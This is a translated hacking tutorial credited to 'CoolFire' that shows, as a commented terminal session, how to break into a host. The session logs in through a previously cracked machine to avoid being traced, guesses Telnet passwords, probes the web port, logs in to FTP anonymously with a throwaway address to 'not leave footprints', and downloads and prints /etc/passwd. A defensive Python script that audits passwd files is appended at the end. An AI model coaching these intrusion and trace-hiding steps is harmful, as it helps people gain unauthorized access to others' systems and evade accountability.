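There are several ways to get into a host: through Telnet (Port 23), SendMail (Port 25),
FTP, or WWW (Port 80). A host has only one address, but it may be running
several services at the same time, so if all you want is to "get into" that host, these
ports are all good directions to work in. There are of course many other ports, but what
could you do with the DayTime port??? I don't know, do you?!
The demonstration below is not as easy as it looks written down; it is only meant to help
you understand how to get in. There were of course plenty of problems along the way, such
as mistyped commands and so on, that do not appear in the lesson, but to save face I had
to delete those unsightly bits...
Demonstration of how to get into a host: (By CoolFire)
(First connect to a Telnet host on which you already have an account. Ideally it is a fake
one, that is, a host that has already been cracked, which you then use to crack other
hosts, so that nobody can trace the connection back to where you are.)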
Digital UNIX (ms.hinet.net) (ttypa)
login: FakeName
Password:
Last login: Mon Dec 2 03:24:00 from 255.255.0.0
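(I'm using ms.hinet.net ... it's fake of course, everything has been altered!!
There is no such host!! Don't worry! Don't worry! All the host names below are
fake, please remember that, class!!)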
Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)
(Mm... we're in! Let the attack begin! This time the target is......)
ms.hinet.net> telnet www.爱爱爱爱you.hinet.net (Try Telnet....)
Trying 111.222.255.255...
Connected to cool.爱爱爱爱you.hinet.net.
Escape character is '^]'.
Password:
Login incorrect
(Never mind, try again!!)
cool login: hinet
Password:
Login incorrect
cool login:
(None of the guesses were right. The method used here is guessing, and luck doesn't seem to be with us today)
telnet> close
Connection closed.
(Start over, try a different port!!)
ms.hinet.net> telnet 111.222.255.255 80
Trying 111.222.255.255...
Connected to 111.222.255.255.
Escape character is '^]'.
<html>
<head>
<title>Error</title>
</head>
<body>
<h1>Error 400</h1>

Invalid request "" (unknown method)

<p><hr/><address><a href="http://www.w3.org">CERN-HTTPD 3.0A</a></address>
</p></body>
</html>
Connection closed by foreign host.
(Argh!! Not even a place to enter a password, really..... Again!! Be persistent!!)
(Try the FTP port)
ms.hinet.net> ftp 111.222.255.255
Connected to 111.222.255.255.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (111.222.255.255:FakeName): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user! This is an experimental FTP server. If have any
230-unusual problems, please report them via e-mail to [email protected]
230-If you do have problems, please try using a dash (-) as the first character
230-of your password -- this will turn off the continuation messages that may
230-be confusing your ftp client.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
(Wow! We can get in as anonymous!! For the password just enter aaa@ !
Don't leave footprints!!)
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
etc
pub
usr
bin
lib
incoming
welcome.msg
226 Transfer complete.
(Mm-hm... great! We're in!! The next target is.....)
ftp> cd etc
250 CWD command successful.
ftp> get passwd (Grab it!!)
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (566 bytes).
226 Transfer complete.
566 bytes received in 0.56 seconds (0.93 Kbytes/s)
(Oh... is it this easy??)
ftp> !cat passwd (Take a look!!!)
root::0:0:root:/root:/bin/bash
bin::1:1:bin:/bin:
daemon::2:2:daemon:/sbin:
adm::3:4:adm:/var/adm:
lp::4:7:lp:/var/spool/lpd:
sync::5:0:sync:/sbin:/bin/sync
shutdown::6:0:shutdown:/sbin:/sbin/shutdown
halt::7:0:halt:/sbin:/sbin/halt
mail::8:12:mail:/var/spool/mail:
news::9:13:news:/var/spool/news:
uucp::10:14:uucp:/var/spool/uucp:
operator::11:0:operator:/root:/bin/bash
games::12:100:games:/usr/games:
man::13:15:man:/usr/man:
postmaster::14:12:postmaster:/var/spool/mail:/bin/bash
ftp:*:404:1::/home/ftp:/bin/bash
(Argh... it's Shadow... what a bad start.... )
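Seen from the administrator's side, a passwd file like the one listed above is something to audit. The following is an added example, not part of CoolFire's original text: a Python check over passwd(5)-format lines that flags empty password fields, stored hashes, extra UID 0 accounts and service accounts that keep a login shell. The first three sample lines are taken from the listing above; the toor entry, the malformed line, the placeholder set and the UID threshold of 999 are constructed assumptions.

```python
# Added example: audit passwd(5)-format text for risky entries (defensive check).
SAMPLE = """\
root::0:0:root:/root:/bin/bash
operator::11:0:operator:/root:/bin/bash
ftp:*:404:1::/home/ftp:/bin/bash
toor:CONSTRUCTED-HASH:0:0:constructed:/root:/bin/sh
broken-line-without-fields
"""  # lines 1-3 come from the listing above; lines 4-5 are constructed

# Password-field placeholders meaning "no usable hash is stored in this file".
LOCKED = {"*", "x", "!", "!!", "*LK*"}
# Shells that refuse interactive logins.
NOLOGIN = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false"}


def audit_line(line, system_uid_max=999):
    """Return a list of findings for one passwd line (empty list = clean)."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 7 or not fields[2].isdigit():
        return ["malformed"]
    name, pw, uid, _gid, _gecos, _home, shell = fields
    uid = int(uid)
    shell = shell or "/bin/sh"  # passwd(5): an empty shell field means /bin/sh
    findings = []
    if pw == "":
        findings.append("empty-password")      # no password recorded at all
    elif pw not in LOCKED:
        findings.append("hash-exposed")        # hash sits in a readable file
    if uid == 0 and name != "root":
        findings.append("extra-uid0")          # second superuser account
    if name != "root" and uid <= system_uid_max and shell not in NOLOGIN:
        findings.append("service-login-shell") # system account can log in
    return findings


def audit(text):
    """Map account name (or 'line N' for malformed input) to its findings."""
    report = {}
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        found = audit_line(line)
        if found:
            key = f"line {n}" if found == ["malformed"] else line.split(":", 1)[0]
            report[key] = found
    return report


if __name__ == "__main__":
    for account, found in audit(SAMPLE).items():
        print(f"{account}: {', '.join(found)}")
```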